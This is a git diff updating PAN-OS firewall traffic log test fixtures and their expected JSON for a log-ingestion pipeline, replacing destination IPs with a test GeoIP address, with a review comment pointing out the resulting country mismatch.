 Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,end,1,2012/04/10 04:39:47,192.168.0.2,192.168.0.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25310,1,60026,53,0,0,0x200000,udp,allow,166,166,0,2,2012/04/10 04:39:16,1,any,0,0,0x0,192.168.0.0-192.168.255.255,192.168.0.0-192.168.255.255,0,2,0
-Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,27111,1,59276,80,0,0,0x200000,tcp,allow,429,351,78,4,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,3,1
-Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,25398,1,59275,80,0,0,0x200000,tcp,allow,429,351,78,4,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,3,1
-Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:46,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,23898,1,59274,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:46,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
+Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 
04:39:47,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,27111,1,59276,80,0,0,0x200000,tcp,allow,429,351,78,4,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,3,1
+Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,25398,1,59275,80,0,0,0x200000,tcp,allow,429,351,78,4,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,3,1
+Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:46,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,23898,1,59274,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:46,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
diff --git a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-traffic-sample.log-expected.json b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-traffic-sample.log-expected.json
index 203c05cb5df..50d42fec91c 100644
--- a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-traffic-sample.log-expected.json
+++ b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-traffic-sample.log-expected.json
@@ -4,27 +4,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 0, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -43,7 +42,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,11449,1,59324,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:59,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,11449,1,59324,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:59,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -77,7 +76,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:MaqerLAYuvMg6JWjWKmIMO6QJ6s=", + "community_id": "1:yr/t+D7vuUqVI0fdtRb/nP4gu7g=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", 
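Review bot: The first hunk's rebuilt `destination.geo` now asserts `"country_name": "China"` and `"region_name": "Jilin"` from the GeoIP lookup right next to the unchanged `"name": "United States"`, which appears to be the destination-country field the PAN-OS log line itself carries, so the expected document describes a destination that is in the US and in China at the same time. This is a fixture problem rather than a pipeline bug, but it means the test no longer shows what a correctly enriched, self-consistent event looks like, and any future logic that cross-checks device-reported geo against enriched geo would be validated against contradictory data. Either pick a test address whose entry in the test GeoIP database matches the country the sample log reports (if the supported subset includes a US-located address), or change the country field in the sample log as well so that `"name"` and `"country_name"` agree; the same mismatch applies to the `Italy` end-of-session line in the sample log, which now also resolves to China.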
@@ -115,14 +114,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.283825436Z", - "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,11449,1,59324,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:59,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381640800Z", + "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,11449,1,59324,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:59,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:12.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -145,24 +144,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 209, + "number": 4837, "organization": { - "name": "CenturyLink Communications, LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 0, - "ip": "205.171.2.25", + "ip": "175.16.199.1", "packets": 0 }, "rule": { 
@@ -181,7 +182,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,25572,1,54448,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,25572,1,54448,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -215,7 +216,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:rmRctS0ZS56Ixay3V5beNERhPNc=", + "community_id": "1:IFiloquB8SJwpj0MxaRT5g/kI7A=", "transport": "udp", "application": "dns", "type": "ipv4", @@ -253,14 +254,14 @@ ], "ip": [ "192.168.0.2", - "205.171.2.25", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.283844627Z", - "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,25572,1,54448,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381649400Z", + "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,25572,1,54448,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:12.000-04:00", "timezone": "America/New_York", "kind": "event", 
@@ -283,24 +284,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 209, + "number": 4837, "organization": { - "name": "CenturyLink Communications, LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 0, - "ip": "205.171.2.25", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -319,7 +322,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,26208,1,53121,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,26208,1,53121,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -353,7 +356,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:NmeRH4O3xNBaUjzIOpdGXeAJ/sg=", + "community_id": "1:aQJiHujA4LNWL+ALWtBZUSyJxCQ=", "transport": "udp", "application": "dns", "type": "ipv4", 
@@ -391,14 +394,14 @@ ], "ip": [ "192.168.0.2", - "205.171.2.25", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.283849945Z", - "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,26208,1,53121,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381653100Z", + "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,26208,1,53121,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:12.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -421,27 +424,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 0, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 0 }, "rule": { 
@@ -460,7 +462,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,14931,1,59323,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,14931,1,59323,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -494,7 +496,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:ej/0QPUwuraByxuNxWsOp2ouPuE=", + "community_id": "1:3d+Fwim2dQa0+h/nRd3TzRj0Atg=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", @@ -532,14 +534,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.283854588Z", - "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,14931,1,59323,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381657700Z", + "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,14931,1,59323,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:12.000-04:00", "timezone": "America/New_York", "kind": "event", 
@@ -562,27 +564,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 0, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -601,7 +602,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,25544,1,59322,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,25544,1,59322,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -635,7 +636,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:XHKuVPA6enGOr0Qng8AJtYTgWAQ=", + "community_id": "1:KEcAQwd+P0HVZett4hVmUnJIMUk=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", 
@@ -673,14 +674,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.283859072Z", - "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,25544,1,59322,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381663400Z", + "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,25544,1,59322,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:12.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -703,24 +704,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 209, + "number": 4837, "organization": { - "name": "CenturyLink Communications, LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 0, - "ip": "205.171.2.25", + "ip": "175.16.199.1", "packets": 0 }, "rule": { 
@@ -739,7 +742,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,25308,1,55766,53,0,0,0x200000,udp,allow,74,74,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,25308,1,55766,53,0,0,0x200000,udp,allow,74,74,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -773,7 +776,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:bkpOCSg/r3P7zn1eVdfrSSHQMn0=", + "community_id": "1:oJXNJjP8YUd2K52dT52HB1COHGE=", "transport": "udp", "application": "dns", "type": "ipv4", @@ -811,14 +814,14 @@ ], "ip": [ "192.168.0.2", - "205.171.2.25", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.283863552Z", - "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,25308,1,55766,53,0,0,0x200000,udp,allow,74,74,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381668800Z", + "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,25308,1,55766,53,0,0,0x200000,udp,allow,74,74,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:12.000-04:00", "timezone": "America/New_York", "kind": "event", 
@@ -841,24 +844,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 209, + "number": 4837, "organization": { - "name": "CenturyLink Communications, LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 0, - "ip": "205.171.2.25", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -877,7 +882,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,26376,1,55072,53,0,0,0x200000,udp,allow,74,74,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,26376,1,55072,53,0,0,0x200000,udp,allow,74,74,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -911,7 +916,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:f08UBDqcNW5jC3R+i40XfD1g8l8=", + "community_id": "1:AEjQ0MYEFyts5DOUSkd6snMeUZM=", "transport": "udp", "application": "dns", "type": "ipv4", 
@@ -949,14 +954,14 @@ ], "ip": [ "192.168.0.2", - "205.171.2.25", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.283868102Z", - "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,26376,1,55072,53,0,0,0x200000,udp,allow,74,74,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381674200Z", + "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,26376,1,55072,53,0,0,0x200000,udp,allow,74,74,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:12.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -979,27 +984,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 806, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 4 }, "rule": { 
@@ -1018,7 +1022,7 @@ }, "packets": 6 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25118,1,59207,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25118,1,59207,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4", "panw": { "panos": { "ruleset": "rule1", @@ -1052,7 +1056,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:kGyE7FdnFLrk4Cc6NHaD5WeE81A=", + "community_id": "1:OubaUyUFYfBa05WxsTDcSGq6qdo=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", 
@@ -1090,14 +1094,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 1000000000, - "ingested": "2021-09-08T12:38:09.283872518Z", - "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,end,1,2012/04/10 04:39:58,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25118,1,59207,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4", + "ingested": "2021-12-09T13:43:22.381679500Z", + "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,end,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25118,1,59207,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4", "created": "2012-10-30T09:46:12.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -1120,27 +1124,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 806, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 4 }, "rule": { 
